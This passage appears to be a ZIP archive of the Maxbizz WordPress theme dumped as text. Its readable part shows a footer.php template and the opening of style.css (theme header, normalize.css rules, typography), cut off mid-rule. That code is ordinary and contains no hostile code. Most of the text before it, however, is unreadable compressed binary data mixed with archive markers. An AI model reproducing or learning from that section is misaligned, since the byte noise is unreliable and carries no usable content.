l{{=��_��w��4Q�
�
g1��*�K�d�H �V���$�b\��bt�U�xgp����›T̖���Ŗ����)�^f��[�-}>ꨌ'I%DZyO�F'�*�A���u���ɶ|����\E��Y��w��V�z�f���5�z��]ϰT2�a�o��i0�τ�$j�74Ip�O���}�αlGx�v�i��r͌�q�eˆ��˜:!�Pf�����$�m��ۮ������Z�ьooe01ۿ�ަ�<����h�.NO��O4�,�5���8�5�A�LM�y��r���T��7��h_�k�a;J�������-��:eq��'���Ï�.a����XάG�77�'��/��0z�d�x�"~��^����J�bi9I*$P��;�OwD۶�i�b.��Íq޳w� �џʘ��ѯ�U)����l��v�߬�_f��
	a��K�*Ý���s(���Y�"��[}O�����x��LH����>S6I|�E:~%�T���B�G���ۺ�<�+��4[�p�6:��=궩ٜ�zk�sw���c��k�!&]�/'���'";��h[�\���>�ٶ֏�g郝	�eҬ���2"�	13w3p�ph�f诤�{k�C��1Xv���!�ɒ��#�1u#�_�L�z��P—n�}?��ȱ����m�2G4��dT��MUꉸ��F�#o�����N>&:�.eR��o��Җ�ݦ���y==GN&N�����7�lP	~TȻ�m�<V���9j �>��n>ם�fb��,[Nܘ��/$�N@�X���O�}N�v��a�m�n�$�^S��|�Ϙ��f�g'�ެ�.n��
�64���>^޷�>p���,@�C0�9�Y��BMԙ�6��;C�1e�7@D���"�a�M36�SVu.7N`3�N�&l��{	��>W=�.Ƭ�]��Cb��dğ~���>c�JL��
~_��O���)�}J���6[b�#�vޫ��/����x�e2��Uv+�5�ӿ��T�X�ȗ�qQ����A���n@T{i��t�韪(�C��Xv�Ѿr9S�N'�c��S+����r�D�P�%�I�v�Wafa#�4O%�0鍞?���.�|�b�����\3F��� <8�ZO��[ ��`J�p��F�F�}ܴ��Lp<���Mܾ���(-P-�DU@�;��zqEj�z(���^4�*x̙�1�,�����A��|\8�-��c��My��Zk�z4��^��z�y�ϊI1��q��Y<K��u��v���z���~8yf2�Ɗ7�)�U� ]�~¨&����#��/�>��w�ݷM��A'�%���3�r+���'W����zގ��t~ó��d�2���ȴ��~aqȶ���ׇ��o��G�Nu�������l�.��oepv4La|�o�����L9��P��J�F��� 0�}H�/�����2���y˄���Ə�j�S$�r�$~ <�ٍ|	�C+G)�Ռ��k�g?�>���bni�c��I��G��߰� ���P�)����=�Kg�Sq�2Kˉ��6C��}.E/�C�¥9��,�IU�5j�%��
,�:y[t(ƂWũ�o����f�7�;|(ړ��*�m�VN'�n��6�	�'��7<�N�������׬�)	$����t%��
����j^ݵ�[�F݉6l��bR�x�+W��F�� ��q��͉Fo:Q���#����j�IѸ\��'ݥ���TW�����e�� ��#�p���������j���e9"0\���5�
EQ�?J�G;/���G��Y�fh ���5 _�jIݷ>��y�C��~Ds������B����%�����fq0Fɂṷ	�̀m��񦾒jg�^�����˹E���aFc�cb1�,�$_(/x���_���rq����[���<)<�I%f7dy�;q�>���U�:K�7��i�ڰ�a�9���.<e!P˯�,S�D]h�i����|�G�ŎP�i����BdB.��;/�,��p���!��4_L�9��������΄�x�F)��t=+�m�q�^պ�ӽ�^h�vM�O1lnU[Z'ЀV�F'#�om��n���V\��ac�߂�О@�r"�m~����NL�_�,�
Uc]Ń�7��֦��k�b�s�^f�b�:_m�aS���>PĪ�)��=1�l퓤�}�e�灂�!‘d+�2��srٻ�
��ԛ�J��Q�m��,��ċ睸�J�P:���Ƃ�.��Y�Ԙ��t�.׉#�;����c�5aɃ*(g�I6�V.[������h\\m��rr>~�m��μ��<�<�����W>?K�ٶ��޶��*3&��{$�6:��d�A�5��*.�-�=u��{�X�ӓ���v����<�YU�	#�7�8u|M��z+
~��ܲ:�7@ɛ��F�n@E�Y��ʂ�Ya1:��7��\~���
�.FU�|("�yP�VG3*��
Vn�_T������u�lm�<�]�u�ir'��՟V1Me>X™V��}m�ػ.N>��R��G�B�����Η��_J,�������ƃ�z�h���%�c_q��V�8T�NRm}i��c���`�OO��9����r�qĮ6�51(���.��b�S�ؘ r&߂>Z_¡"����)k5˛�Z�S��j{{{}&�^�<�K*��!C3���Pm�c-��􏪷�ǵ���b���D���WDؾ�lPrI�������1���Ѩ[�m�`鍊!���E�,1p�_N±��\�>��W1��$���~�L"$�M�o��&O��H��X{ꇣ�#^TP�?
��Q����(%A�":TT��c}X�(e!J�
EZ+@Eh��+P�@e������P9�:Ğy�M�a�4�t����F���~]u�]4��nќ��M�rS
!�����+ɿ��=Z{Y���}M��;y�TIĬ��!�*ך�/��]'�����Ħ׌[�y� �5���?���/p�&���H�ʝ��yy�jަ��[�u�u=���{`���1#�
,����$�y��Uy����r馓_�0��yAB�ྗ�ŵ������D�G��Y�%�z�MO��L� ���YY����L�$�ˁ|	�X�s(l���ͤq�
=��ev7{�,���s���Ba��cF	�~U�?�3x��B��C_�+s���x�>�T�����c�ıc��P�5F��c�,��_�:�B�ɞ8�_?#��h��r�O���A���ĀA��(�LOR>$y�R��������|�ţ-�@��@��|���1�V�svoi��m�j�Zul(���$�]Ot���M��:�������ɅX��E��Cg�R�=�%a�v^�Ƿ�L|3��ή��������.<^Ɖy���5�y��Gĭ��@>���T�����i���KGp��F�A˺���_`eE�v趜'�+|��2_ı���4�k�R����C�>߂��7m�=��O�+!�;��L�?���n�,Y���u=[�ʆ3��	lX��̙yV"�,�j_cC��p�]!&����
��s[�Zr�}�,\�}Y�۴ۢ�u,��O!�l�i&]��!u%y���c͹nm���I�J�PX�P�Xp=����Ҹ_PzSl���Ꮲ��Y[F�R��Ċ�#�h
��y޾�M���Og��uÛ!��,5�hy�>�B�:[����L���A�ٱ6�)
|���E�⹫������u~P�m���w&^x�mr�&u�TL�<���V�as�?�~�Ӹ/���vl��Y;�L�1�r��4��[��9M%L|������L[��dō#7���姑�/�ҖH�r��j.�~��fGLtN�x��g�6|���c�o�b/A#k�ٺmѤ9M�E�Ohg\�=�.v�O��%h�T��ԋ�W1��?H��s�����A��W3hK��>����n��I�cѝT6gط(:s�պ�nLi"#��<BK1Q��ݟ�3�=���{�V�|�Y>W�z�37�(�U�\��E�-�f�o>, I�����}K�+uf�҃��ӻ��M'UCPA3ɗ|��m%���3�� ��J��{֝}�o��Gu���E�hא�`��Ynu-�2�tL�~�����`�H�N3�҉2H�6y�H8�-�ۏӭ�g�oئ�,��Ǩg.�Á����ϒ�~���{�'���� Ą)���M;%��6�5��ۙ����D=����b|�o� S+��PQgV�e�K�[���l��$�k��ϼ�\GG�~�l�*��,ۋ�]$>L?�q�G��2���t��ǁa�Xc� }a.��Wru���#D��rt>����i�D�<����L���
�.?�MO���W�4��
!�[H�P�;_Zj���
����y��\Y��S���hj)D�$��W���U~��{��dα�):�P�ݤ�ֺ�ٝ��ERc����śA�Q�p�������[ݙ�7��2�Y�\R�q��+ͷ>�=qk��}O�Ϳ�,.m� \�`�d?����跗Y�a���S�
��ⷦC�v׃Y߫�ܻ^����Ȑ��F��rY�>�].�14���:/|�uc�)6,�z�'<wӆ�n��1���>@���"F{�
����ן����LT�ц����k�ܛ�w��
�?�+p����Gq�,~9���ڟeC�C�2���lq�#�۝Z��c"�h��?ˏ���-N�cR�
BH~bA��D,�����,�/� Ń�4:���ON�C`�†���n-B���q"�r��ݐ���
=�������r�1�Ň�j���~�����R�y�������݈��r,�m����\Iߨ�3,��x�x��1��۱	����A����Z������;�{U�'����y����޺e&���P�E��O�/$1ʥ�����ƻpm����,�v���u(��&t<��\� І�5��ύu��O�,<�����|X���x�+r��A� �,G}i����RE�����!����M��dK�,�T���	SE˛o�M2d�����(�*�HYHv��R^hۏe2���|�>���<��i�Ή��l"F�7i�i�~�҆����K?P�\��~U�-O���e������������弬�e�B��
~�h(����=Q�����Xlu�ۣ\<}5� �'�j�ϧ>�uO���I��5��e6:Z<R!��f]Cg�}�s���`Kѻ�,��H�$p�̍�xӲ�5�z{�7�ln���l�4cb�"��?��G1�*t�Ϊ������ޒ���R|��!v[/�p��8��E�(�o���mX�o>���'����H[���Z6n�Kp�S+����-� ���$���{f,g�<d��^�Ɋ�+�7
�����w�*HdY�%�+yjC27j}ܹ���O�˸oۇ[oR���+c����:����G@�~���d.׆�9�������V��r��������,R}#�1r���dO�{J�i�ƛ�p}
!b��d�Y��07-���ۻgr2�xm^,�mU�֡�}[�|~���ē���l��pɏ�F�fK�?�x�<�=�F�rk$Nܾ�}���w�FZBAm��Ks�q�Zש��'�v���=�L�������1�4�W�>G>�v+��m{�$�����㔃�n��囕xi��2x,0!���
2�4�?���dD�ca�&i��?�1��L���C��&�<ۃ�y	�b�H�a�5�x�OKt�"8�0�@�X����[��~&˷��{'��b����F�2��yNP���'��>�A�?� C�@��x�HD*��M��������������\�%#P}�ǜ��kS��ˍ�{�(��@#��'�4R�8EY���3���.�_*A��-�,k����]x6����2��4gNX��\ןoqon�F��Y߫���N���?9_#�$��/j��ηmus���t��l؃?�<�'��p���OW;��bs����C.~T�Lu����WI�g<m�s�vÝ� H!fo@���:i�kw��)�g+.U�S�$W�oqk�ᓻ�m=	�m�Q4���+�ܖ��N�<+�����
���Ť��na�孉�2��gF��G�K����ߗ^Pe�/d`ަ>&Hp\�"�[�?�Qe@�缭�?�p��d�qid��|O��	TuNLh��v>갷�/����+#���Rř�"]7<�fo���SW#�N��g�I݇��^�<L}f�H~��ϗ>�������S��
�y�<���_m\k{ٲ�JaFO����/���]��o32C+���L��Js:Z�TpQKp̖��wXOw5���^9��cs��ѺK`s!wPx5�V�ʞ-ߪ��}���,y�E2D}���V�|^�ǣ��7���X�{�V;�E��t��,���C��;��{���g�߂��~��q��x�?����|�A.��[v0�g��Y����Ə'�ȦU�;����nV,�mxUB$�I�E��p�wP@��d�Û
ey1'���#�?�4������d�h�H��9B���}�r��zo�m�����NX��wiorG)xC�k��;h�T�t�@t�Kau.n�2�l-�ß&]N�28��=��n��=�͕&������JS�pC���n��]˩3F,
��m�'�\ط*�~U�iU��'+>s��bI�N�G��n
��/��+��!�����M�����V���ڰ��x϶�;�Wu.��VL󓇳�n�2V��/ks2��q�4��L_��ߓl�vշ�o��Õ�~��ɫ�2���~�u�]韧z�R�N��Hֲ��l�mL_E9/���e�r�|��N���	&��Hub�����+���R�Y}������窢闘2��ϕ��1�/�m�e��}֟O:c7*[tA�c��n��f$�����X���u�����l�f�R]����^�+�e��TW�ʍ�)a�9���X��)R}ume-�$�6NA���L��U�a��_��t2���b�e�[�6yZ9m�*"I�E÷ct�^�ʼn�+휚Ó�g_�	�P�e�t�˴ı`�E���	[
Mܧ��Y�q�l�nX��}܉�l�+���� X�/����(���s�O1ֈ��@�@�@�}�
�\���h��%MJ�m@�z�P��h��I_�REA!1kz2�F����A�Zx��{rI��^=�e._UgJJ�°/�I<M�#�p������E��<"
KL���\.�l�5��{���4[T�(��@�Φ����3yg��o{�{�h�$�c�|o���8��w}��`��`܍�՝�I�M��]x�S�t�g\s�{$Z�o��8����4!e�7�Xuy���׆F�h��pb�ƀG~�Ͽvv���d:��b~�Z��JXX�+o�
�jX����� �
�\��"��;O�֜�&��a����'{�_�Z��\q�ZH��a�Q�;Z�ZL���eE�K��s�Geqi�L��,bCغ��t��66:ݬ���m1���/�#LX��v{����~$�;�2\�߫�O�w�d�h�Qk"����_��E�y�=��m���U��O7�¦d��O�{i���LYf�^bO�Z՝�"�m��TK�Qa�+Xr����Ad�yن� ����1�ֲ[�HM��^؈u���~�&�5p��t�:e~Bd�i�E�ӷ��d�����,���pJ���~��Ɂ�L�^�N64��d�F�½z�M�<��]{��C~�c���<P�8�9�C"�~b8W��F�7o��
t�U�8S�VU�}n\�fL�D��J���q�~#�h(�Η��1�)~s3�2P���9wQ�%S8�iQďĖ���[R
dIT��n�~V��i�Y]��#���ک�>�~�}/���n=o�FI;��,@߳
���UY�T~�gm�>ɋ��b�o��Tj����cj�p�93e�rrgy�}L�;;��I��ݏ���{Pv��|�������ꪸjb�s�m�=[��s
[n��U�{Ň�"\�A�#l}=��h�{|�����@�/��"e��zg�v�|����Ʌlo�n����5����뮍�e��%�q۱�زb"����x5�y�%O��l�q���qܲw��@��N�s)<T�vv�i�J��ں�'p�/�6�Ѹ�ZIf,�����[�KVLwt����߶�����qQ�>\+嬄~.^"�׬�Y�%�m�X8�c���kq4L�R8�x
PP,P"lX'�z{}��l��(�~�q�L �OrȥO�UA��XP(P8�4
�V�"
Z�z*)<��%(�!f6U$�(��@���H5$�d§;��o�#�Ɯ�믤�]�nqڍ��s�Y�� U>]��~��;��U��n�`�NO��4<�oI�^]���N�:�Cx�ޓ�F�## �1�mI���5��0��
�3�-�0b7F���k�'w+�of/&M�s��͚\�����{�+������f���p�BB��a�;��u�u��F��˖B�	�y7��i#_Ot�Ԡ���;_Z�v��X�$���><�Xá�H��^թ�l,$X�"�tQ�[�S��<���\���y��^?e@Q�'���#�QR�T���[���$Ɣv��Q��������r5����V3ig����瀭tCNln5=�p�Ն��q�nQ�g���"_�[��Z���"�%��$�wԵd41٘>A�=�+>7կ?�B����-G�*8���Ç����T��1ԓ���V�� ��:�޾���浸�i��-16����M�#?���.{rc��)1�(���Mt���d6L܇��������ծ�(�cD���h�uc�5�(Ǎ��<���@���K�{vC��#�
��M.���7\56���Ts1�/�澀��k�.�6���N��`�V�pԀD���;}�����߂z$Ŷ4�f޺O~|<�͟o`�D�0�g$��]������QgI�o)|ĺ�")_�K����t�4�M����*w���n\�f
((��NJQi�ǁ�AA���˄e��d��~�4�s�G���[A ��t�r�_O�Vu)�5�L��1:ki�K�h�͙Ћrs���*�K�c��7eU=5�7�>
�wnsq��ooQ4�L��N�gꍾv�r�-�n{��B�Ƨ��WOa�b����gd��R�n�sI�8�~c��u��5���~,�}��f̽W���X�ł�Ľ�U\�?�nn�����^��a�2��I��Z%��i��}���OI$�n��œs>�3�Z�k�nW-~?Nm��Ӯ<Q���'�P�VIQ�"��D,ށ6�;P�
�#�rȡ����R�`nS���\����m"���T�B��*�
�T�Z��/�Z#™�#�{�EG���6����^q�X7'�*[����g3��ʔ��yGd���
+�ܿ]x~,�;�� 9s��x����%���"㑲m���dX�o��>�^5��=��bwo����XM;pxSؼMk����<��Ճݺ����F^k�����=Z��]Rݩ���w�^H���Ƴ�<�k�k_��;�R<<8�myw�/N�ݾ�>�m�2���S�^k�k��ո���Ì,*��-Q�r^NKF���+6���g��R�O ���u읇�`�8���m�Ւ(�t^�8�B�Vqo�~Y��Y�'�F9u�ˠ�b�1�
<XWG��)#��%���e����(���@�ݩ��O}�P��P>��)�28f<*y`���0��ȝ�8�mYrv=*� ��q��yDz�ǰT�i]m@�&Wю��8W+���YX����"dE���dQ�I+��=�av�l8x���@,8��}�X�Z&�i�, ���i�w?�c/��&=�I�Fni�#�C͕(dž��F�۷ShJ��(ǃ�#�M꨷�s�`aNc�4��Z֦�ⓓ$C�����_�Zβ��
���D1��]zd�u�R��1�!�)�#W,��b�N�;|�|)$|�7��b��
k���3�yJ�>�n[\�����e�9|
�^�=�{���y��t�a��e�[��\�s@�≛�^S�^��{<�igv���N^�5x{Eu��+��\F�J��`�u�L��JgŊag]{hG��7�t��rb7��x��u,��I��1�tFq��ܭ�5��6wL�B��m�7Ɛ��̕���i�.G��+���e�#t�r̚y��S0���!�Y�	q��a�NJ�<�%B�8��YL%�1�E8h*�m(��@v���Z��
�P�1@�B��G��,�tMv��7we\��ƚ/�t�B��(��_�Z�R`�^F�x�W;�����,e%�Au��\�6�F����&gSu��_���G��\v�w׊E��E3�J#^-$���V�7��h��Q:?f
R�)xG��;߅I6�L�o?Uz�s-]����Ʒ�Rw�ϝ��x���t�3��39�ܖ&�����Vqݛ������Ccv��Ϳ�wׁ���l�n9׉#�^]��w�r4X�&�\F
F�
�w�Ӳ�,,���/
�1���q���L9[�99q�.Oʖ���S��K!����i0^(wk�ô��3�K�%q���uW92�|�Nr�ը�5!�ߚ�m6�f���(���(��/��$�;i٤E^a =�$B���{���\,�˞:wV�K9}@�wTP-�z�v���\�R0G(�vP:#���uT&YU-�=՝�k]P��������+5�Ҭ���,|)~^�ŧ���#�]5�1v�>K �G`�jHK:8��8��V�6�[k��QN�yT�:ݻd5e/��UY.:n��EE%�A���u���U>��dN4D_�x��L�Hr?��~X.㋞ڲ��>%���y�A�Z�L�oX7b'�4�P��ˇ"%?�~&�XԬ���p<ly
xH��Z�v:n����glw�e7�<����}9,s�H�m_Pf�|�� Q,>m��?H�f���~�q�n����YK$L.9M��z5����š��(�"<�򟇘>]u�^?��J:�!����\���ƂCw@OmG�bȀ
9Mr�Z�@9h��Z�Z��@zP�Aڠ�����@t���b\8$�V�Lq���2��o�B�Ƞ%��jɕ.oZaEx�9���p��k�=�׿EV���7��zxחu�����6ku���Ծ�����7�ښ�<���0[��V�������ڨ5���q��H��;�Q��f�:�DJl��+[�:�gl��~�o��?"��¸��c�����!ƉRL��Z��s�]����ӛ&��8�8]�����O�D�[[�{�u�h�F��*4�7�N�us�t��Aa�v���33cA`|]՛[�ESH�:�M���eX�w=$������Y�*̙��ۇeL�ɄUS#r���}4T�v��4��#t���,+XsȤ�41�wwRŊɲG(���]�,��H"�E�*�\p
*(�R�����r/�5R�Q�-��4B�Kq�wT�E����R֤�L�{�G�Y��i�V����Ʋ���K_E5��n��ۍkY��Ⱥ�(՚Ԉ�d3xb����54�HxjǴ�Q)mK��q��S*偔�v ��=�(NQ���Zd�BI���Vp��c�y����pw<�����ɀ�ˌ5�<#]I��@��F��A0���"���Mk[��#24�Z1k�E;�d�ㄩ/�aĵnk�U~n7��njx�VkS��n��-�̒���Vmb�M�g�/���ߙuG���r����e������|��B�>��ׯ^\�yv�6�~�4J�`N$���{��oEw�a�m3ݡ��\�G�<��k��A���J��p�u=�����j����X��T�j@v��Pz���悧;�6�K�������+�ܺ�޺kŶݢ�/�7\��$b��m[�^m������U|�ĭ��g��X-��^m�6���Y;1;��ޛ�CE�Fw	Ɯˢ�cZ׃kߣ;r�����~��y�g�f���F����iŦ�7?����ڲ�V�f��I'�M�4�8�nz{�v��&H�"#�#z���]��6��;֨DBi{Y�>���˵w�Y;58��4
g`��K��A`�M_&|P��BI業ML�s��[�>0�9��Z���m�8��ʳ;%c_^�X��]T�i4#Qײ�@��j�p�H��Ȇы�
Z�L�L�n�u��9u�+HOo�'b�:�f���L1vMdkh4��32�����\�i�%���wgI�.2�V2�
+(�cU2c}�(����\��I�?�����&���q���yw�i�.�������y��L�(*߈��
>Z��G�
k6�����d��ﱬ�Mb�V���7��
@X�yG�Ja-O�8V� O��Iv����^�z5���a�2'c�L�"
b��5�G:� �*H������e:3��l
�ԓ���� k�׸jj�!o �jZ�..U�S�55
n�%A�p���`b4.��
�eJWA�kq5b� r�[��;�^�5J�{�!�O��h��F�y3v_����4��h�	�S�:�x�ns�����VWf��Q�E�R��9�g\����}�u����+3!�Q��a�)�ދ߻�`�O�Rx�_ĥ�n�e��+v8z�nq6�+����7�"�{{+Ӧ�|9$�t-��23�s�2p�xd�ϩ�m�V�g���_�k0&�q�le�x*�OA�v�m���Z�ag����y`�qF�{�j�6ˎ��0�U�hi@,(U���@(����jl��Kr;۱����Qf]0���g<�:����~[;J���g�c��.��Q���-yw�侕��^9�
-�x۶��&&Nt��LX$����5��kX]����e�h��8x	�ř��������m�sM�u��䫓�(4k�/�v�Y�\췹XV$���p �!��~�Xۓo�o]gŶ�[�ث���J���0������뫢�WH��^$�f����k�ǣR
,v���.�εRA�~ꍉ�p.T��CA�[��k��QoA�7izȫ#6�#HB�v�z�$p�Б�8��]�,��Q�ﱮV�]dW�J��ѷ�R:Z��$C����`kr9mm1�$��H_� �Zk"�ܤ��n�Xv6�������ćTuf=��rڧx@�5�&�����krD_��f�ӥg.�@�؂���#`o}X�#��rma}MT��PK�8FZ����
footer.phpnu�[���<?php
/**
 * The template for displaying the footer
 *
 * Contains the closing of the #content div and all content after.
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package Maxbizz
 */

?>

	</div><!-- #content -->
	<?php
		if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'footer' ) ) {
			maxbizz_footer_builder();
		}
	?>
</div><!-- #page -->
<?php wp_footer(); ?>

</body>
</html>PK�8FZމJ����	style.cssnu�[���@charset "UTF-8";
/*
Theme Name: Maxbizz
Theme URI: http://wpdemo.archiwp.com/maxbizz
Author: OceanThemes
Author URI: http://oceanthemes.net/
Description: Maxbizz is the nice WordPress theme for Consulting and Finance Industry. Financial Advisors, Insurance Brokers, Accountants, Lawyers, Consultants. Maxbizz is easy to use, it provides everything you need to create great looking website. With Maxbizz you can impress your customer by it’s professional design and the interactivity. Maxbizz built with latest website technology to ensure your website is looks nice on desktop and mobile. Get Maxbizz now!
Version: 1.0
License: GNU General Public License v2+
License URI: http://www.gnu.org/licenses/gpl-2.0.html
Text Domain: maxbizz
Domain Path: /languages/
Tags: one-column, two-columns, left-sidebar, right-sidebar, full-width-template, post-formats, theme-options, threaded-comments, translation-ready

*/
/*--------------------------------------------------------------
>>> TABLE OF CONTENTS:
----------------------------------------------------------------
# Normalize
# Typography
# Elements
# Forms
# Navigation
	## Links
	## Menus
# Accessibility
# Alignments
# Clearings
# Widgets
# Content
	## Posts and pages
	## Comments
# Infinite scroll
# Media
	## Captions
	## Galleries
--------------------------------------------------------------*/
/*--------------------------------------------------------------
# Normalize
--------------------------------------------------------------*/
/*! normalize.css v8.0.0 | MIT License | github.com/necolas/normalize.css */
/* Document
	 ========================================================================== */
/**
 * 1. Correct the line height in all browsers.
 * 2. Prevent adjustments of font size after orientation changes in iOS.
 */
html {
  line-height: 1.15;
  /* 1 */
  -webkit-text-size-adjust: 100%;
  /* 2 */
  overflow-x: hidden;
}

/* Sections
	 ========================================================================== */
/**
 * Remove the margin in all browsers.
 */
body {
  margin: 0;
  overflow: hidden;
}

/* Grouping content
	 ========================================================================== */
/**
 * 1. Add the correct box sizing in Firefox.
 * 2. Show the overflow in Edge and IE.
 */
hr {
  box-sizing: content-box;
  /* 1 */
  height: 0;
  /* 1 */
  overflow: visible;
  /* 2 */
}

/**
 * 1. Correct the inheritance and scaling of font size in all browsers.
 * 2. Correct the odd `em` font sizing in all browsers.
 */
pre {
  font-family: monospace, monospace;
  /* 1 */
  font-size: 1em;
  /* 2 */
}

/* Text-level semantics
	 ========================================================================== */
/**
 * Remove the gray background on active links in IE 10.
 */
a {
  background-color: transparent;
}

/**
 * 1. Remove the bottom border in Chrome 57-
 * 2. Add the correct text decoration in Chrome, Edge, IE, Opera, and Safari.
 */
abbr[title] {
  border-bottom: none;
  /* 1 */
  text-decoration: underline;
  /* 2 */
  text-decoration: underline dotted;
  /* 2 */
}

/**
 * Add the correct font weight in Chrome, Edge, and Safari.
 */
b,
strong {
  font-weight: bold;
}

/**
 * 1. Correct the inheritance and scaling of font size in all browsers.
 * 2. Correct the odd `em` font sizing in all browsers.
 */
code,
kbd,
samp {
  font-family: monospace, monospace;
  /* 1 */
  font-size: 1em;
  /* 2 */
}

/**
 * Add the correct font size in all browsers.
 */
small {
  font-size: 80%;
}

/**
 * Prevent `sub` and `sup` elements from affecting the line height in
 * all browsers.
 */
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}

sub {
  bottom: -0.25em;
}

sup {
  top: -0.5em;
}

/* Embedded content
	 ========================================================================== */
/**
 * Remove the border on images inside links in IE 10.
 */
img {
  border-style: none;
}

/* Forms
	 ========================================================================== */
/**
 * 1. Change the font styles in all browsers.
 * 2. Remove the margin in Firefox and Safari.
 */
button,
input,
optgroup,
select,
textarea {
  font-family: inherit;
  /* 1 */
  font-size: 100%;
  /* 1 */
  line-height: 1.15;
  /* 1 */
  margin: 0;
  /* 2 */
}

/**
 * Show the overflow in IE.
 * 1. Show the overflow in Edge.
 */
button,
input {
  /* 1 */
  overflow: visible;
}

/**
 * Remove the inheritance of text transform in Edge, Firefox, and IE.
 * 1. Remove the inheritance of text transform in Firefox.
 */
button,
select {
  /* 1 */
  text-transform: none;
}

/**
 * Correct the inability to style clickable types in iOS and Safari.
 */
button,
[type=button],
[type=reset],
[type=submit] {
  -webkit-appearance: button;
}

/**
 * Remove the inner border and padding in Firefox.
 */
button::-moz-focus-inner,
[type=button]::-moz-focus-inner,
[type=reset]::-moz-focus-inner,
[type=submit]::-moz-focus-inner {
  border-style: none;
  padding: 0;
}

/**
 * Restore the focus styles unset by the previous rule.
 */
button:-moz-focusring,
[type=button]:-moz-focusring,
[type=reset]:-moz-focusring,
[type=submit]:-moz-focusring {
  outline: 1px dotted ButtonText;
}

/**
 * Correct the padding in Firefox.
 */
fieldset {
  padding: 0.35em 0.75em 0.625em;
}

/**
 * 1. Correct the text wrapping in Edge and IE.
 * 2. Correct the color inheritance from `fieldset` elements in IE.
 * 3. Remove the padding so developers are not caught out when they zero out
 *		`fieldset` elements in all browsers.
 */
legend {
  box-sizing: border-box;
  /* 1 */
  color: inherit;
  /* 2 */
  display: table;
  /* 1 */
  max-width: 100%;
  /* 1 */
  padding: 0;
  /* 3 */
  white-space: normal;
  /* 1 */
}

/**
 * Add the correct vertical alignment in Chrome, Firefox, and Opera.
 */
progress {
  vertical-align: baseline;
}

/**
 * Remove the default vertical scrollbar in IE 10+.
 */
textarea {
  overflow: auto;
}

/**
 * 1. Add the correct box sizing in IE 10.
 * 2. Remove the padding in IE 10.
 */
[type=checkbox],
[type=radio] {
  box-sizing: border-box;
  /* 1 */
  padding: 0;
  /* 2 */
}

/**
 * Correct the cursor style of increment and decrement buttons in Chrome.
 */
[type=number]::-webkit-inner-spin-button,
[type=number]::-webkit-outer-spin-button {
  height: auto;
}

/**
 * 1. Correct the odd appearance in Chrome and Safari.
 * 2. Correct the outline style in Safari.
 */
[type=search] {
  -webkit-appearance: textfield;
  /* 1 */
  outline-offset: -2px;
  /* 2 */
}

/**
 * Remove the inner padding in Chrome and Safari on macOS.
 */
[type=search]::-webkit-search-decoration {
  -webkit-appearance: none;
}

/**
 * 1. Correct the inability to style clickable types in iOS and Safari.
 * 2. Change font properties to `inherit` in Safari.
 */
::-webkit-file-upload-button {
  -webkit-appearance: button;
  /* 1 */
  font: inherit;
  /* 2 */
}

/* Interactive
	 ========================================================================== */
/*
 * Add the correct display in Edge, IE 10+, and Firefox.
 */
details {
  display: block;
}

/*
 * Add the correct display in all browsers.
 */
summary {
  display: list-item;
}

/* Misc
	 ========================================================================== */
/**
 * Add the correct display in IE 10+.
 */
template {
  display: none;
}

/**
 * Add the correct display in IE 10.
 */
[hidden] {
  display: none;
}

/*--------------------------------------------------------------
# Typography
--------------------------------------------------------------*/
body,
button,
input,
select,
optgroup,
textarea {
  color: #5f5f5f;
  font-family: "Open Sans", sans-serif;
  font-size: 16px;
  line-height: 1.875;
  font-weight: 400;
  word-break: break-word;
  box-sizing: border-box;
}

h1, h2, h3, h4, h5, h6 {
  font-family: "Inter", sans-serif;
  font-weight: 700;
  line-height: 1.2;
  margin: 0 0 20px;
  color: #1b1d21;
}

h1 {
  font-size: 48px;
}

h2 {
  font-size: 42px;
}

h3 {
  font-size: 36px;
}

h4 {
  font-size: 30px;
}

h5 {
  font-size: 24px;
}

h6 {
  font-size: 20px;
}

@media (max-width: 767px) {
  h2 {
    font-size: 34px;
  }

  h3 {
    font-size: 27px;
  }

  h4 {
    font-size: 21px;
  }
}
p {
  margin: 0 0 20px;
}

dfn, cite, em, i {
  font-style: italic;
}

blockquote {
  position: relative;
  margin: 30px 0;
  font-family: "Inter", sans-serif;
  font-style: normal;
  font-weight: 500;
  color: #1b1d21;
  padding-top: 73px;
  text-align: center;
  font-size: 22px;
}
blockquote:before {
  content: "";
  font-family: Flaticon;
  font-size: 29px;
  position: absolute;
  left: 50%;
  top: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
  margin-left: -25px;
  color: #fe8423;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
  box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.1);
  -webkit-box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.1);
  -moz-box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.1);
}
blockquote cite {
  font-style: normal;
  font-size: 14px;
  font-weight: bold;
  color: #fe8423;
  text-transform: uppercase;
  display: block;
  margin-top: 14px;
}

address {
  margin: 0 0 1.5em;
}

pre {
  background: #eee;
  font-family: "Courier 10 Pitch", Courier, monospace;
  font-size: 15px;
  line-height: 1.7142857143;
  margin-bottom: 1.6em;
  max-width: 100%;
  overflow: auto;
  padding: 1.6em;
}

code, kbd, tt, var {
  font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace;
  font-size: 15px;
}

abbr, acronym {
  border-bottom: 1px dotted #666;
  cursor: help;
}

mark, ins {
  background: #fff9c0;
  text-decoration: none;
}

.bg-alt {
  background: #f7f7f7;
}

.bg-primary {
  background: #fe8423;
}

.text-primary {
  color: #fe8423;
}

.text-dark {
  color: #1b1d21;
}

.text-light {
  color: #fff;
}
.text-light * {
  color: #fff;
}

.font-main {
  font-family: "Open Sans", sans-serif;
}

.font-second {
  font-family: "Inter", sans-serif;
}

.clear-both {
  clear: both;
}

.unstyle {
  list-style: none;
  padding-left: 0;
  margin-left: 0;
}

.list-primary {
  padding-left: 0;
  list-style: none;
}
.list-primary li {
  margin-bottom: 17px;
  padding-left: 35px;
  position: relative;
}
.list-primary li:before {
  content: "";
  width: 6px;
  height: 6px;
  position: absolute;
  left: 17px;
  top: 13px;
  background: #fe8423;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}

.bbold {
  font-weight: 900;
}

.exbold {
  font-weight: 800;
}

.sbold {
  font-weight: 600;
}

.normal {
  font-weight: 400;
}

.lighter {
  font-weight: 300;
}

.f-left {
  float: left;
}

.f-right {
  float: right;
}

.dtable {
